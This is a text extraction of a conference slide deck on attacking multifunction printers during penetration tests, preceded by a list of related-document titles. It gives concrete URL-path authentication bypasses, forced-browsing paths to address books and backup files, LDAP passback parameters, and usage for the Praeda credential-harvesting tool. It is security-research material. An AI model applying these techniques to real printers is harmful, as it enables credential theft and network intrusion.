FROM PRINTER TO PWND. Leveraging Multifunction Printers During Penetration Testing



Similar documents
Plunder Pillage & Print

Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers

Administering the Web Server (IIS) Role of Windows Server

Administering the Web Server (IIS) Role of Windows Server 10972B; 5 Days

10972B: Administering the Web Server (IIS) Role of Windows Server

THE OPEN UNIVERSITY OF TANZANIA

SafeCom Smart Printing Administrator s Quick Guide

CAC/PIV PKI Solution Installation Survey & Checklist

Installation and Setup Guide

Administering the Web Server (IIS) Role of Windows Server

Simple Network Management Pwnd. Information Data Leakage Attacks Against SNMP

Security FAQs (Frequently Asked Questions) for Xerox Remote Print Services

Bitrix Site Manager ASP.NET. Installation Guide

Administrator Operations Guide

Web Application Vulnerability Testing with Nessus

Virtual Managment Appliance Setup Guide

Virtual Web Appliance Setup Guide

NTP Software VFM Administration Web Site for EMC Atmos

Web App Security Audit Services

Thirtyseven4 Endpoint Security (EPS) Upgrading Instructions

Customer Tips. Configuring Color Access on the WorkCentre 7328/7335/7345 using Windows Active Directory. for the user. Overview

Scan to Cloud Installation Guide

Copyright 2013 Trend Micro Incorporated. All rights reserved.

How To Configure A Rihoh Multi Function Device (Mfd) On A Macbook Or Ipad Or Ipa (Aero) With A Powerpoint 2.5 (A.I.A.A2) With An Ipa

Link and Sync Guide for Hosted QuickBooks Files

ECE 4893: Internetwork Security Lab 12: Web Security

Setting Up Scan to SMB on TaskALFA series MFP s.

The Top Web Application Attacks: Are you vulnerable?

Xopero Backup Build your private cloud backup environment. Getting started

CA Performance Center

HDAccess Administrators User Manual. Help Desk Authority 9.0

Useful Tips for Reducing the Risk of Unauthorized. Access for Laser Beam Printers and Small-Office MFPs

SafeCom Smart Printing. Product Overview 40%

SyncThru Database Migration

Quick Scan Features Setup Guide

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN)

HarePoint Workflow Extensions for Office 365. Quick Start Guide


HOW TO CONFIGURE SQL SERVER REPORTING SERVICES IN ORDER TO DEPLOY REPORTING SERVICES REPORTS FOR DYNAMICS GP

NETASQ MIGRATING FROM V8 TO V9

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

Configuration Manual

Configuring Color Access on the WorkCentre 7120 Using Microsoft Active Directory Customer Tip

Copyright 2012 Trend Micro Incorporated. All rights reserved.

Smart Card Authentication. Administrator's Guide

F-Secure Messaging Security Gateway. Deployment Guide

Where every interaction matters.

Product description of the docuform Fleet & Service Management software

MadCap Software. Upgrading Guide. Pulse

Service Manager and the Heartbleed Vulnerability (CVE )

Setting up Sharp MX-Color Imagers for Inbound Fax Routing to or Network Folder

Microsoft Administering the Web Server (IIS) Role of Windows Server

Quick Scan Features Setup Guide. Scan to Setup. See also: System Administration Guide: Contains details about setup.

Tutorial. Inventory Methods

Fasthosts Internet Parallels Plesk 10 Manual

About the Canon Mobile Scanning MEAP Application

SonicWALL Security Quick Start Guide. Version 4.6

Trend Micro Worry- Free Business Security st time setup Tips & Tricks

HP OfficeJet Pro 276DW Scan to Network Folder and Digital Fax to Network Folder not working after firmware upgrade

Criteria for web application security check. Version

Linux VPS with cpanel. Getting Started Guide

HP A-IMC Firewall Manager

Front-Office Server 2.7

Managing Qualys Scanners

What is WS_FTP Server Web Transfer Module?...1 System Requirements...2. What is WS_FTP Server Web Transfer Module?

MS 10972A Administering the Web Server (IIS) Role of Windows Server

VERALAB LDAP Configuration Guide

Kaseya Server Instal ation User Guide June 6, 2008

What is the Barracuda SSL VPN Server Agent?

Table of Contents. 1 Overview 1-1 Introduction 1-1 Product Design 1-1 Appearance 1-2

Securing the Service Desk in the Cloud

HP IMC Firewall Manager

Toshiba MFP Devices: UWO Deployment Challenges

Version 1.0 January Xerox Phaser 3635MFP Extensible Interface Platform

Device Log Export ENGLISH

HOW TO GUIDE. Pcounter Scan Server. For Support Click here INTRODUCTION

Home About Us Products White Papers Manuals & Forms FAQs Contact Us Glossary

10972-Administering the Web Server (IIS) Role of Windows Server

Customer Tips. Xerox Network Scanning HTTP/HTTPS Configuration using Microsoft IIS. for the user. Purpose. Background

Step-by-Step Setup Guide Wireless File Transmitter FTP Mode

Remote Authentication and Single Sign-on Support in Tk20

Customer Tips. Xerox Network Scanning TWAIN Configuration for the WorkCentre 7328/7335/7345. for the user. Purpose. Background

Learn Ethical Hacking, Become a Pentester

Tenrox. Single Sign-On (SSO) Setup Guide. January, Tenrox. All rights reserved.

Preparing for GO!Enterprise MDM On-Demand Service

WHITE PAPER. CounThru TM 2 Professional Managed Print Service. Introduction. Management Science

Document Capture and Distribution

How To Export Data From Exchange To A Mailbox On A Pc Or Macintosh (For Free) With A Gpl Or Ipa (For A Free) Or Ipo (For Cheap) With An Outlook 2003 Or Outlook 2007 (For An Ub

Penetration Testing with Kali Linux

Contents. Before You Install Server Installation Configuring Print Audit Secure... 10

NovaBACKUP xsp Version 15.0 Upgrade Guide

Configuring MailArchiva with Insight Server

ZENworks 11 Support Pack 4 Management Zone Settings Reference. May 2016

NETASQ SSO Agent Installation and deployment

Table of Contents. Introduction. Audience. At Course Completion

Locking down a Hitachi ID Suite server

Cleo Streem Fax Users Guide. Version 7.1

Alliance Key Manager A Solution Brief for Technical Implementers

Introduction to the EIS Guide

Client logo placeholder XXX REPORT. Page 1 of 37

Transcription:

FROM PRINTER TO PWND Leveraging Multifunction Printers During Penetration Testing

INTRODUCTION From Dayton Ohio region Last 18 years in IT 10 year in security 3 of those as a security penetration tester Member of foofus.net team 3rd time presenting at Defcon w00t!

AGENDA Multi function printer features Multi function printer security Attacking multi function printer devices Leveraging these attacks during pentesting Development of an automated harvesting tool Conclusion & Question

MULTI FUNCTION PRINTER FEATURES

MULTI FUNCTION PRINTER FEATURES Scan to File Window file server access FTP server access Scan to Email Email server SMTP access Email Notification Email server SMTP access

MULTI FUNCTION PRINTER FEATURES LDAP authentication services User address books System logging Remote functionality Backup/cloning

MULTI FUNCTION PRINTER SECURITY

MULTI FUNCTION PRINTER SECURITY Four steps to security failure Roll it in and power it up Integrate with business systems Passwords No password set Factory default setting No patch management

ATTACKING MULTI FUNCTION PRINTER DEVICES

ATTACKING MULTI FUNCTION PRINTERS Why Gather information Escalation rights into other core systems When If exposed to internet Once you gain a foot hold into internal network

ATTACKING MULTI FUNCTION PRINTERS How Leveraging default password Access bypass attacks Information leakage attacks Forceful browsing attacks Backup/cloning functions Passback attack

MFP SECURITY BYPASS ATTACK The ability to bypass authentication on a device by passing various forms of data in the URL Toshiba HP

TOSHIBA BYPASS ATTACK /TopAccess/Administrator/Setup/ScanToFile/List.htm Redirects to /TopAccess/Administrator/Login/Login.htm

TOSHIBA BYPASS ATTACK /TopAccess//Administrator/Setup/ScanToFile/List.htm

HP OFFICEJET BYPASS ATTACK DEMO

MFP INFORMATION LEAKAGE ATTACKS MFP devices exposing data unintentionally. Data of value can typically be extracted from web page source code. Toshiba Canon HP Sharp

TOSHIBA INFORMATION LEAKAGE ATTACK

TOSHIBA INFORMATION LEAKAGE ATTACK

HP INFORMATION LEAKAGE ATTACK

MFP FORCED BROWSING ATTACK Access to web pages and files are gained by just knowing the correct URL path Not uncommon to find that embedded devices such as printers correctly secure files with extensions of cgi htm html But may allow access to other file types

CANON FORCED BROWSING Canon ImageRunners address books can be retrieved through forceful browsing Once a valid cookie is gained the address books can be retrieved without authenticating A valid cookie is gained by accessing the printers home page Fails on devices with a Product Name ir3580 ir4080

CANON FORCED BROWSING Force browse to address books abook.ldif abook.abk imagerunners have by default up to 11 address books Increment up to gain access to all address books

CANON FORCED BROWSING

MFP PASSBACK ATTACK Passback attack An attack where the MFP device is tricked into communicating with the attacker, versus communicating with its standard configured services Number of printers have test functions for testing LDAP configuration setups May also be possible on other services

MFP PASSBACK ATTACK LDAP Test Button Attacker Change LDAP server IP Setting Printer Auth to LDAP LDAP Server LDAP Test Button LDAP auth to attacker

SHARP PASSBACK ATTACK Sharp MX series support these test functions for: LDAP SMTP Attacker can send all setting within HTTP(s) post request If password is left at ******* then stored password is used

SHARP PASSBACK ATTACK

SHARP PASSBACK ATTACK Post values of interest Server IP Address (ggt_textbox(21) AUTH TYPE ggt_select(25) PORT Number ggt_hidden(30)

SHARP PASSBACK ATTACK

RICOH PASSBACK ATTACK Similar issue at the Sharp printers Easily tricked in passing data back to the attacker

RICOH PASSBACK ATTACK

RICOH PASSBACK ATTACK /web/entry/en/websys/ldapserver/ldapserversetconfirmtest.cgi paramcontrol=input&urllang=en&urlprofile=entry&urlscheme=http&returnvalue=suc CESS&title=LDAP_SERVER&availability=nameonserverNameonsearchPointonportNumon sslonauthonusernameonpasswordonkerberosonconnecttestonsearchnameonmailaddres sonfaxnumoncompanynameonpostnameonoptionalsearchconditionon&authinfo=false&l dapservernumselectedout=1&entrynameout=acmecd01&servernameout=10.80.105. 200&searchPointOut=DC%3Dacme&portNumOut=389&enableSSLOut=false&enableAut hout=radio_no_authradio_plain_auth_onradio_digest_auth_onradio_kerber OS_ONRADIO_PLAIN_AUTH_ON&userNameOut=LDAPAdmin&isRealmKeyNameOut=1111 1&realmNameOut=UA_NOT_LOGINUA_NOT_LOGINUA_NOT_LOGINUA_NOT_LOGINUA_NOT _LOGIN0&searchNameOut=cn&searchMlAddOut=mail&searchFaxNumOut=facsimileTele phonenumber&searchcompanynameout=o&searchpostnameout=ou&searchattrout=&s earchkeyout=&entryname=acmecd01&servername=10.80.105.200&searchpoint=dc% 3Dacme&portNum=389&enableSSL=false&enableAuth=RADIO_PLAIN_AUTH_ON&userN ame=ldapadmin&searchname=cn&searchmladd=mail&searchfaxnum=facsimileteleph onenumber&searchcompanyname=o&searchpostname=ou&searchattr=&searchkey=

MFP BACKUP/CLONING Extracted information from backup data A number of MFP devices provide a method to backup/clone system configuration This function prides a method to quickly deploy multiple devices throughout an organization without needing physical access to each devices

CANON BACKUP EXPORT Additional functions export Usermode.umd http://mfp/usermode.umd Usermode.umd is a data file but does contain ascii

XEROX DEMO

PRAEDA BUILDING AN AUTOMATED HARVESTING TOOL

PRAEDA AUTOMATED HARVESTING TOOL PRAEDA latin for plunder, spoils of war, booty Tool designed to gather information from web interfaces on printers Present version written in Perl

PRAEDA AUTOMATED HARVESTING TOOL Present version 16 modules Extract data from 39 different printers models Canon Xerox Toshiba Sharp HP Ricoh

PRAEDA AUTOMATED HARVESTING TOOL

PRAEDA AUTOMATED HARVESTING TOOL Data file (DATA_LIST) 1st field (P000032) = sequence number 2 nd field (Top Page MX-2600N) = Title page 3 rd field (Rapid Logic/1.1) = Server type 4 th field (MP0014) = Module to execute

PRAEDA AUTOMATED HARVESTING TOOL Syntax DISPATCHER (PRAEDA.PL) praeda.pl TARGET_FILE TCP_PORT PROJECT_NAME OUTPUT_FILE (-ssl) Queries printers in target list If a match is found in data_list module jobs listed in 4 th column are executed Recovered data is stored in logs file or separate extract files under project name

PRAEDA AUTOMATED HARVESTING TOOL Praeda project moving forward Continue researching encryption methods used by some vendors for backup and clone process outputs HP Xerox Working migrating code to Ruby early stages of conversion started Will continue developing in Perl for the moment Looking for contributors for project Develop other network appliance modules besides printers plan to release a half dozen or more modules next month

CONCLUSION & QUESTION Deral Heiland percx@foofus.net dh@layereddefense.com Praeda Beta version 0.01.2b available for download from www.foofus.net